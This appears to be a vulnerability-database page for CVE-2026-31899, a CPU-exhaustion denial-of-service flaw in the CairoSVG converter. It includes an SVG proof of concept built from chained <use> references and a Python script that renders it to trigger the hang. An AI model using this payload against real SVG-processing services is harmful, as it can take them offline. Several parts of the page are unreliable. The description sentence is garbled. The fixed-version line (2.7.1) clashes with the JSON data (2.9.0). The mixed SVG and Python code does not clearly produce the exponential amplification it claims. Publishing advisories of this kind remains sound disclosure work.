Security Vulnerability Report
中文
CVE-2026-31899 CVSS 7.5 HIGH

CVE-2026-31899

Published: 2026-03-13 19:54:38
Last Modified: 2026-03-18 15:16:49
Source: [email protected]

Description

CairoSVG is an SVG converter based on Cairo, a 2D graphics library. Prior to Kozea/CairoSVG has exponential denial of service via recursive <use> element amplification in cairosvg/defs.py. This causes CPU exhaustion from a small input.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:courtbouillon:cairosvg:*:*:*:*:*:*:*:* - VULNERABLE
Kozea/CairoSVG < 2.7.1 (修复版本)
所有未应用安全补丁的CairoSVG版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2026-31899 PoC: Exponential DoS via recursive <use> elements --> <!-- This SVG creates exponential CPU exhaustion --> <svg xmlns="http://www.w3.org/2000/svg"> <defs> <!-- Create a chain of recursive references --> <rect id="a" width="100" height="100"/> <use id="b" href="#a"/> <use id="c" href="#b"/> <use id="d" href="#c"/> <!-- Multiple nested uses amplify the effect --> <use id="e" href="#d"/> <use id="f" href="#e"/> <use id="g" href="#f"/> <use id="h" href="#g"/> <use id="i" href="#h"/> <use id="j" href="#i"/> </defs> <!-- Multiple uses referencing the chain --> <use href="#j"/> <use href="#j"/> <use href="#j"/> <use href="#j"/> <use href="#j"/> </svg> <!-- Python exploitation example --> import cairosvg import time # Read the malicious SVG with open('poc.svg', 'r') as f: svg_content = f.read() # This will cause CPU exhaustion start = time.time() try: cairosvg.svg2png(bytestring=svg_content.encode(), write_to='output.png') except Exception as e: print(f"Processing failed: {e}") print(f"Time elapsed: {time.time() - start}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31899", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:38.190", "lastModified": "2026-03-18T15:16:48.653", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CairoSVG is an SVG converter based on Cairo, a 2D graphics library. Prior to Kozea/CairoSVG has exponential denial of service via recursive <use> element amplification in cairosvg/defs.py. This causes CPU exhaustion from a small input."}, {"lang": "es", "value": "CairoSVG es un conversor de SVG basado en Cairo, una libreríade gráficos 2D. Anteriormente, Kozea/CairoSVG tenía una denegación de servicio exponencial a través de la amplificación recursiva del elemento en cairosvg/defs.py. Esto causa el agotamiento de la CPU a partir de una entrada pequeña."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-674"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:courtbouillon:cairosvg:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.9.0", "matchCriteriaId": "901094B9-8320-4ACD-BE63-925FC6B199E1"}]}]}], "references": [{"url": "https://github.com/Kozea/CairoSVG/commit/6dde8685ed3f19837767bce7a13a5491e3d0e0bf", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Kozea/CairoSVG/security/advisories/GHSA-f38f-5xpm-9r7c", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.